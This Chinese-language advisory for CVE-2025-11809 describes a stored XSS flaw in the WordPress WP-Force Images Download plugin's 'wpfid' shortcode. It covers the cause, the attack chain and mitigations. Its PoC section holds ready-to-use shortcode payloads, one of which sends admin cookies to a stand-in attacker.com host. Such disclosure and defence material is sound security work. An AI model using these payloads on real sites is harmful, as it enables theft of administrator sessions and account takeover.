CVE-2025-11809 WordPress WP-Force Images Download插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11809

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress WP-Force Images Download 插件

漏洞概述

CVE-2025-11809是WordPress WP-Force Images Download插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该插件是一款用于强制下载WordPress站点图片的工具，提供了通过短代码（shortcode）将图片下载功能嵌入页面的能力。

该漏洞存在于插件的'wpfid'短代码处理逻辑中，具体位于'class'属性的处理流程中。由于插件开发者在实现短代码渲染时，未对用户输入的'class'属性值进行充分的输入净化（input sanitization）和输出转义（output escaping），导致攻击者可以在该属性中注入恶意的JavaScript代码。这些恶意代码会被持久化存储到WordPress数据库中，每当有用户访问包含该短代码的页面时，恶意脚本就会在受害者浏览器中自动执行。

根据CVSS 3.1评分标准，该漏洞评分为6.4分，属于中危级别。攻击者需要具备Contributor（投稿者）级别及以上的认证权限才能利用此漏洞，但一旦利用成功，可以在管理员或其他高权限用户访问被注入页面时执行任意JavaScript代码，从而窃取会话Cookie、篡改页面内容、进行权限提升或执行其他恶意操作。

该漏洞影响插件的所有版本，包括最新发布的1.8版本及之前的所有版本。由于该漏洞需要认证权限才能利用，且影响范围限于已认证用户可访问的内容，因此其严重程度被评定为中危。Wordfence安全团队于2025年10月22日公开披露了该漏洞，并提供了相应的修复建议。

技术细节

该漏洞的根本原因在于WP-Force Images Download插件在处理'wpfid'短代码时，对'class'属性的输入验证和输出编码存在缺陷。

技术原理分析：
1. WordPress短代码机制允许开发者在文章、页面或自定义帖子类型中通过[shortcode_name attribute="value"]的形式插入动态内容。WP-Force Images Download插件注册了名为'wpfid'的短代码，用于在页面中渲染图片下载功能。
2. 在短代码处理函数中，插件接收用户传入的'class'属性值，该属性通常用于为渲染的HTML元素添加CSS样式类。然而，插件未对该属性值调用WordPress标准的安全函数（如esc_attr()、sanitize_text_field()或wp_kses()）进行净化处理。
3. 由于缺少输出转义，攻击者构造的恶意JavaScript代码（如onerror、onload事件处理器或包含<script>标签的内容）会被原样写入最终生成的HTML输出中。
4. 当受害用户访问包含该恶意短代码的页面时，浏览器会解析并执行嵌入的恶意脚本，导致XSS攻击成功。

利用方式：
攻击者首先需要拥有一个Contributor级别及以上的WordPress账号（可通过注册获得）。然后在创建或编辑文章/页面时，插入如下恶意短代码：
[wpfid class="x" onmouseover="alert(document.cookie)"]
或者使用更隐蔽的注入方式，在class属性中嵌入完整的恶意脚本载荷。当管理员预览、审核或访问该页面时，恶意代码即被执行。

攻击链分析

STEP 1

步骤1：获取认证账号

攻击者通过WordPress注册功能或利用已获取的凭证，获得Contributor（投稿者）级别及以上的认证账号权限。

STEP 2

步骤2：构造恶意短代码

攻击者在文章编辑器中构造包含恶意JavaScript代码的'wpfid'短代码，利用'class'属性未净化的缺陷注入XSS载荷。

STEP 3

步骤3：提交并存储恶意内容

攻击者将包含恶意短代码的文章/页面提交保存，由于缺乏输入净化，恶意代码被持久化存储到WordPress数据库中。

STEP 4

步骤4：等待受害者访问

当管理员、编辑或其他用户预览、审核或正常访问包含恶意短代码的页面时，浏览器解析HTML并执行注入的JavaScript代码。

STEP 5

步骤5：执行恶意操作

恶意脚本在受害者浏览器上下文中执行，可窃取会话Cookie、劫持账号、篡改页面内容、进行权限提升或植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-11809 -->
<!-- Step 1: Login as Contributor or higher role -->
<!-- Step 2: Create a new post or page -->
<!-- Step 3: Insert the following malicious shortcode in the content editor -->

[wpfid class="x\" onmouseover=\"alert(document.cookie)\"]

<!-- Or use a more sophisticated payload for cookie stealing -->

[wpfid class="x\" onmouseover=\"var i=new Image();i.src='https://attacker.com/steal?c='+document.cookie;\"]

<!-- Or using event handler injection via class attribute -->

[wpfid class="\" style=\"background:url(javascript:alert('XSS'))\""]

<!-- After submission, when any user (especially admin) views the page, -->
<!-- the injected JavaScript will execute in their browser context -->

影响范围

WP-Force Images Download <= 1.8

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）暂时禁用WP-Force Images Download插件；2）限制Contributor及以上角色的用户注册和文章发布权限；3）在主题functions.php中添加短代码过滤逻辑，拦截可疑的'wpfid'短代码使用；4）部署Web应用防火墙规则，过滤包含onmouseover、onerror等事件处理器或javascript:伪协议的请求；5）启用WordPress的Content Security Policy插件，限制页面脚本执行范围；6）定期审查已发布内容，删除可疑的短代码注入。